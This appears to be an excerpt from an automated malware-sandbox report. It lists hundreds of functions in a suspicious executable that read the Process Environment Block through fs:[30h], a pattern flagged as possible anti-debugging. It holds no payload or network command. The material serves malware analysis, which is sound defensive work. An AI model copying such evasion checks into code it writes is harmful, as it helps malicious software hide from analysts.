Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01040710 mov eax, dword ptr fs:[00000030h]	3_2_01040710
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104C720 mov eax, dword ptr fs:[00000030h]	3_2_0104C720
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104C720 mov eax, dword ptr fs:[00000030h]	3_2_0104C720
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104273C mov eax, dword ptr fs:[00000030h]	3_2_0104273C
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104273C mov ecx, dword ptr fs:[00000030h]	3_2_0104273C
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104273C mov eax, dword ptr fs:[00000030h]	3_2_0104273C
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108C730 mov eax, dword ptr fs:[00000030h]	3_2_0108C730
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104674D mov esi, dword ptr fs:[00000030h]	3_2_0104674D
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104674D mov eax, dword ptr fs:[00000030h]	3_2_0104674D
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104674D mov eax, dword ptr fs:[00000030h]	3_2_0104674D
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01010750 mov eax, dword ptr fs:[00000030h]	3_2_01010750
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109E75D mov eax, dword ptr fs:[00000030h]	3_2_0109E75D
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052750 mov eax, dword ptr fs:[00000030h]	3_2_01052750
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052750 mov eax, dword ptr fs:[00000030h]	3_2_01052750
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01094755 mov eax, dword ptr fs:[00000030h]	3_2_01094755
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01018770 mov eax, dword ptr fs:[00000030h]	3_2_01018770
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020770 mov eax, dword ptr fs:[00000030h]	3_2_01020770
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020770 mov eax, dword ptr fs:[00000030h]	3_2_01020770
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020770 mov eax, dword ptr fs:[00000030h]	3_2_01020770
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020770 mov eax, dword ptr fs:[00000030h]	3_2_01020770
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020770 mov eax, dword ptr fs:[00000030h]	3_2_01020770
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020770 mov eax, dword ptr fs:[00000030h]	3_2_01020770
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020770 mov eax, dword ptr fs:[00000030h]	3_2_01020770
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020770 mov eax, dword ptr fs:[00000030h]	3_2_01020770
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020770 mov eax, dword ptr fs:[00000030h]	3_2_01020770
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020770 mov eax, dword ptr fs:[00000030h]	3_2_01020770
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020770 mov eax, dword ptr fs:[00000030h]	3_2_01020770
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020770 mov eax, dword ptr fs:[00000030h]	3_2_01020770
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010B678E mov eax, dword ptr fs:[00000030h]	3_2_010B678E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010C47A0 mov eax, dword ptr fs:[00000030h]	3_2_010C47A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010107AF mov eax, dword ptr fs:[00000030h]	3_2_010107AF
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101C7C0 mov eax, dword ptr fs:[00000030h]	3_2_0101C7C0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010907C3 mov eax, dword ptr fs:[00000030h]	3_2_010907C3
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109E7E1 mov eax, dword ptr fs:[00000030h]	3_2_0109E7E1
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010327ED mov eax, dword ptr fs:[00000030h]	3_2_010327ED
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010327ED mov eax, dword ptr fs:[00000030h]	3_2_010327ED
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010327ED mov eax, dword ptr fs:[00000030h]	3_2_010327ED
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010147FB mov eax, dword ptr fs:[00000030h]	3_2_010147FB
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010147FB mov eax, dword ptr fs:[00000030h]	3_2_010147FB
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108E609 mov eax, dword ptr fs:[00000030h]	3_2_0108E609
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0102260B mov eax, dword ptr fs:[00000030h]	3_2_0102260B
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0102260B mov eax, dword ptr fs:[00000030h]	3_2_0102260B
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0102260B mov eax, dword ptr fs:[00000030h]	3_2_0102260B
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0102260B mov eax, dword ptr fs:[00000030h]	3_2_0102260B
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0102260B mov eax, dword ptr fs:[00000030h]	3_2_0102260B
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0102260B mov eax, dword ptr fs:[00000030h]	3_2_0102260B
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0102260B mov eax, dword ptr fs:[00000030h]	3_2_0102260B
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01052619 mov eax, dword ptr fs:[00000030h]	3_2_01052619
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01046620 mov eax, dword ptr fs:[00000030h]	3_2_01046620
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01048620 mov eax, dword ptr fs:[00000030h]	3_2_01048620
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0102E627 mov eax, dword ptr fs:[00000030h]	3_2_0102E627
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101262C mov eax, dword ptr fs:[00000030h]	3_2_0101262C
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0102C640 mov eax, dword ptr fs:[00000030h]	3_2_0102C640
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010D866E mov eax, dword ptr fs:[00000030h]	3_2_010D866E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010D866E mov eax, dword ptr fs:[00000030h]	3_2_010D866E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104A660 mov eax, dword ptr fs:[00000030h]	3_2_0104A660
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104A660 mov eax, dword ptr fs:[00000030h]	3_2_0104A660
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01042674 mov eax, dword ptr fs:[00000030h]	3_2_01042674
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01014690 mov eax, dword ptr fs:[00000030h]	3_2_01014690
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01014690 mov eax, dword ptr fs:[00000030h]	3_2_01014690
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104C6A6 mov eax, dword ptr fs:[00000030h]	3_2_0104C6A6
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010466B0 mov eax, dword ptr fs:[00000030h]	3_2_010466B0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104A6C7 mov ebx, dword ptr fs:[00000030h]	3_2_0104A6C7
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104A6C7 mov eax, dword ptr fs:[00000030h]	3_2_0104A6C7
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010906F1 mov eax, dword ptr fs:[00000030h]	3_2_010906F1
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010906F1 mov eax, dword ptr fs:[00000030h]	3_2_010906F1
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108E6F2 mov eax, dword ptr fs:[00000030h]	3_2_0108E6F2
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108E6F2 mov eax, dword ptr fs:[00000030h]	3_2_0108E6F2
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108E6F2 mov eax, dword ptr fs:[00000030h]	3_2_0108E6F2
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108E6F2 mov eax, dword ptr fs:[00000030h]	3_2_0108E6F2
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108E908 mov eax, dword ptr fs:[00000030h]	3_2_0108E908
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108E908 mov eax, dword ptr fs:[00000030h]	3_2_0108E908
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01008918 mov eax, dword ptr fs:[00000030h]	3_2_01008918
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01008918 mov eax, dword ptr fs:[00000030h]	3_2_01008918
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109C912 mov eax, dword ptr fs:[00000030h]	3_2_0109C912
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010A892B mov eax, dword ptr fs:[00000030h]	3_2_010A892B
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109892A mov eax, dword ptr fs:[00000030h]	3_2_0109892A
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E4940 mov eax, dword ptr fs:[00000030h]	3_2_010E4940
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01090946 mov eax, dword ptr fs:[00000030h]	3_2_01090946
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01036962 mov eax, dword ptr fs:[00000030h]	3_2_01036962
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01036962 mov eax, dword ptr fs:[00000030h]	3_2_01036962
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01036962 mov eax, dword ptr fs:[00000030h]	3_2_01036962
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0105096E mov eax, dword ptr fs:[00000030h]	3_2_0105096E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0105096E mov edx, dword ptr fs:[00000030h]	3_2_0105096E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0105096E mov eax, dword ptr fs:[00000030h]	3_2_0105096E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010B4978 mov eax, dword ptr fs:[00000030h]	3_2_010B4978
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010B4978 mov eax, dword ptr fs:[00000030h]	3_2_010B4978
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109C97C mov eax, dword ptr fs:[00000030h]	3_2_0109C97C
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010229A0 mov eax, dword ptr fs:[00000030h]	3_2_010229A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010229A0 mov eax, dword ptr fs:[00000030h]	3_2_010229A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010229A0 mov eax, dword ptr fs:[00000030h]	3_2_010229A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010229A0 mov eax, dword ptr fs:[00000030h]	3_2_010229A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010229A0 mov eax, dword ptr fs:[00000030h]	3_2_010229A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010229A0 mov eax, dword ptr fs:[00000030h]	3_2_010229A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010229A0 mov eax, dword ptr fs:[00000030h]	3_2_010229A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010229A0 mov eax, dword ptr fs:[00000030h]	3_2_010229A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010229A0 mov eax, dword ptr fs:[00000030h]	3_2_010229A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010229A0 mov eax, dword ptr fs:[00000030h]	3_2_010229A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010229A0 mov eax, dword ptr fs:[00000030h]	3_2_010229A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010229A0 mov eax, dword ptr fs:[00000030h]	3_2_010229A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010229A0 mov eax, dword ptr fs:[00000030h]	3_2_010229A0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010109AD mov eax, dword ptr fs:[00000030h]	3_2_010109AD
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010109AD mov eax, dword ptr fs:[00000030h]	3_2_010109AD
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010989B3 mov esi, dword ptr fs:[00000030h]	3_2_010989B3
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010989B3 mov eax, dword ptr fs:[00000030h]	3_2_010989B3
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010989B3 mov eax, dword ptr fs:[00000030h]	3_2_010989B3
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010A69C0 mov eax, dword ptr fs:[00000030h]	3_2_010A69C0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0101A9D0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0101A9D0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0101A9D0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0101A9D0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0101A9D0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0101A9D0 mov eax, dword ptr fs:[00000030h]	3_2_0101A9D0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010449D0 mov eax, dword ptr fs:[00000030h]	3_2_010449D0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010DA9D3 mov eax, dword ptr fs:[00000030h]	3_2_010DA9D3
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109E9E0 mov eax, dword ptr fs:[00000030h]	3_2_0109E9E0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010429F9 mov eax, dword ptr fs:[00000030h]	3_2_010429F9
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010429F9 mov eax, dword ptr fs:[00000030h]	3_2_010429F9
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109C810 mov eax, dword ptr fs:[00000030h]	3_2_0109C810
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010B483A mov eax, dword ptr fs:[00000030h]	3_2_010B483A
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010B483A mov eax, dword ptr fs:[00000030h]	3_2_010B483A
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104A830 mov eax, dword ptr fs:[00000030h]	3_2_0104A830
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01032835 mov eax, dword ptr fs:[00000030h]	3_2_01032835
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01032835 mov eax, dword ptr fs:[00000030h]	3_2_01032835
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01032835 mov eax, dword ptr fs:[00000030h]	3_2_01032835
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01032835 mov ecx, dword ptr fs:[00000030h]	3_2_01032835
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01032835 mov eax, dword ptr fs:[00000030h]	3_2_01032835
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01032835 mov eax, dword ptr fs:[00000030h]	3_2_01032835
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01022840 mov ecx, dword ptr fs:[00000030h]	3_2_01022840
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01040854 mov eax, dword ptr fs:[00000030h]	3_2_01040854
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01014859 mov eax, dword ptr fs:[00000030h]	3_2_01014859
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01014859 mov eax, dword ptr fs:[00000030h]	3_2_01014859
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010A6870 mov eax, dword ptr fs:[00000030h]	3_2_010A6870
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010A6870 mov eax, dword ptr fs:[00000030h]	3_2_010A6870
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109E872 mov eax, dword ptr fs:[00000030h]	3_2_0109E872
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109E872 mov eax, dword ptr fs:[00000030h]	3_2_0109E872
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01010887 mov eax, dword ptr fs:[00000030h]	3_2_01010887
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109C89D mov eax, dword ptr fs:[00000030h]	3_2_0109C89D
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103E8C0 mov eax, dword ptr fs:[00000030h]	3_2_0103E8C0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E08C0 mov eax, dword ptr fs:[00000030h]	3_2_010E08C0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010DA8E4 mov eax, dword ptr fs:[00000030h]	3_2_010DA8E4
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104C8F9 mov eax, dword ptr fs:[00000030h]	3_2_0104C8F9
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104C8F9 mov eax, dword ptr fs:[00000030h]	3_2_0104C8F9
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E4B00 mov eax, dword ptr fs:[00000030h]	3_2_010E4B00
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108EB1D mov eax, dword ptr fs:[00000030h]	3_2_0108EB1D
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108EB1D mov eax, dword ptr fs:[00000030h]	3_2_0108EB1D
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108EB1D mov eax, dword ptr fs:[00000030h]	3_2_0108EB1D
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108EB1D mov eax, dword ptr fs:[00000030h]	3_2_0108EB1D
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108EB1D mov eax, dword ptr fs:[00000030h]	3_2_0108EB1D
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108EB1D mov eax, dword ptr fs:[00000030h]	3_2_0108EB1D
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108EB1D mov eax, dword ptr fs:[00000030h]	3_2_0108EB1D
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108EB1D mov eax, dword ptr fs:[00000030h]	3_2_0108EB1D
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108EB1D mov eax, dword ptr fs:[00000030h]	3_2_0108EB1D
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103EB20 mov eax, dword ptr fs:[00000030h]	3_2_0103EB20
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103EB20 mov eax, dword ptr fs:[00000030h]	3_2_0103EB20
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010D8B28 mov eax, dword ptr fs:[00000030h]	3_2_010D8B28
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010D8B28 mov eax, dword ptr fs:[00000030h]	3_2_010D8B28
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010C4B4B mov eax, dword ptr fs:[00000030h]	3_2_010C4B4B
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010C4B4B mov eax, dword ptr fs:[00000030h]	3_2_010C4B4B
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010B8B42 mov eax, dword ptr fs:[00000030h]	3_2_010B8B42
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010A6B40 mov eax, dword ptr fs:[00000030h]	3_2_010A6B40
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010A6B40 mov eax, dword ptr fs:[00000030h]	3_2_010A6B40
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010DAB40 mov eax, dword ptr fs:[00000030h]	3_2_010DAB40
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01008B50 mov eax, dword ptr fs:[00000030h]	3_2_01008B50
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E2B57 mov eax, dword ptr fs:[00000030h]	3_2_010E2B57
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E2B57 mov eax, dword ptr fs:[00000030h]	3_2_010E2B57
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E2B57 mov eax, dword ptr fs:[00000030h]	3_2_010E2B57
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E2B57 mov eax, dword ptr fs:[00000030h]	3_2_010E2B57
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BEB50 mov eax, dword ptr fs:[00000030h]	3_2_010BEB50
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0100CB7E mov eax, dword ptr fs:[00000030h]	3_2_0100CB7E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020BBE mov eax, dword ptr fs:[00000030h]	3_2_01020BBE
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020BBE mov eax, dword ptr fs:[00000030h]	3_2_01020BBE
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010C4BB0 mov eax, dword ptr fs:[00000030h]	3_2_010C4BB0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010C4BB0 mov eax, dword ptr fs:[00000030h]	3_2_010C4BB0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01030BCB mov eax, dword ptr fs:[00000030h]	3_2_01030BCB
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01030BCB mov eax, dword ptr fs:[00000030h]	3_2_01030BCB
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01030BCB mov eax, dword ptr fs:[00000030h]	3_2_01030BCB
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01010BCD mov eax, dword ptr fs:[00000030h]	3_2_01010BCD
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01010BCD mov eax, dword ptr fs:[00000030h]	3_2_01010BCD
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01010BCD mov eax, dword ptr fs:[00000030h]	3_2_01010BCD
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BEBD0 mov eax, dword ptr fs:[00000030h]	3_2_010BEBD0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01018BF0 mov eax, dword ptr fs:[00000030h]	3_2_01018BF0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01018BF0 mov eax, dword ptr fs:[00000030h]	3_2_01018BF0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01018BF0 mov eax, dword ptr fs:[00000030h]	3_2_01018BF0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109CBF0 mov eax, dword ptr fs:[00000030h]	3_2_0109CBF0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103EBFC mov eax, dword ptr fs:[00000030h]	3_2_0103EBFC
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0109CA11 mov eax, dword ptr fs:[00000030h]	3_2_0109CA11
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104CA24 mov eax, dword ptr fs:[00000030h]	3_2_0104CA24
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103EA2E mov eax, dword ptr fs:[00000030h]	3_2_0103EA2E
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01034A35 mov eax, dword ptr fs:[00000030h]	3_2_01034A35
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01034A35 mov eax, dword ptr fs:[00000030h]	3_2_01034A35
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104CA38 mov eax, dword ptr fs:[00000030h]	3_2_0104CA38
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01016A50 mov eax, dword ptr fs:[00000030h]	3_2_01016A50
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01016A50 mov eax, dword ptr fs:[00000030h]	3_2_01016A50
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01016A50 mov eax, dword ptr fs:[00000030h]	3_2_01016A50
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01016A50 mov eax, dword ptr fs:[00000030h]	3_2_01016A50
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01016A50 mov eax, dword ptr fs:[00000030h]	3_2_01016A50
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01016A50 mov eax, dword ptr fs:[00000030h]	3_2_01016A50
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01016A50 mov eax, dword ptr fs:[00000030h]	3_2_01016A50
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020A5B mov eax, dword ptr fs:[00000030h]	3_2_01020A5B
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01020A5B mov eax, dword ptr fs:[00000030h]	3_2_01020A5B
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104CA6F mov eax, dword ptr fs:[00000030h]	3_2_0104CA6F
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104CA6F mov eax, dword ptr fs:[00000030h]	3_2_0104CA6F
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0104CA6F mov eax, dword ptr fs:[00000030h]	3_2_0104CA6F
